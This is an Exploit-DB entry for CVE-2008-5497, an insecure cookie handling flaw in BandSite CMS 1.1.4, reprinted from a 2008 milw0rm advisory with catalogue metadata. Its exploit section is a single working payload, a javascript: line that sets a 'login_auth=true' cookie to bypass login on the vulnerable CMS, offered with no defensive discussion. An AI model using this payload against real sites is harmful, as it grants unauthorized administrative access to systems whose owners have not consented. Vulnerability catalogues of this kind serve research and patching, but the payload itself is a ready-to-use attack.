[] NeoSense

BandSite CMS 1.1.4 - Insecure Cookie Handling

Author: Stack
type: webapps
platform: php
port: 
date_added: 2008-11-12 
date_updated: 2016-12-21 
verified: 1 
codes: OSVDB-50701;CVE-2008-5497 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combandsitecmsVer1x1x4.zip

###########################################################################
[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "login_auth=true; path=/";

# milw0rm.com [2008-11-13]